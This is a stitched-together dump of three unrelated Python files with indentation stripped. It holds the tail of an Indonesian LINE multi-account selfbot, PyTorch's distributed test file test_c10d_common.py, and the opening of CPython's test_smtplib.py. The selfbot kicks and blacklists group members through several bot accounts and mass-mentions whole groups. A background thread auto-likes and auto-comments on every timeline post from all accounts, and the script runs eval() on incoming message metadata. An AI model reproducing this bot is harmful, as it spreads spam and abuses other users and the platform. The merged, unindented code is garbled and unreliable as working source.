if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif msg.text.lower() in ["Ats","Tag","mention all"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN=
"u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
cl.sendText
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
test_c10d_common.py
|
# Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
import unittest
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
self._spawn_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d.distributed_c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d.distributed_c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d.distributed_c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d.distributed_c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
def test_backend_class_attr(self):
dist.Backend.register_backend(
"dummy",
PythonProcessGroupTest.create_dummy
)
self.assertEqual(dist.Backend.DUMMY, "DUMMY")
self.assertEqual(
dist.Backend._plugins["DUMMY"],
PythonProcessGroupTest.create_dummy
)
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.destroy_process_group()
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
# intentionally not calling into `destroy_process_group` as not all
# user applications would explicitly that.
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST, HOSTv4, HOSTv6
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
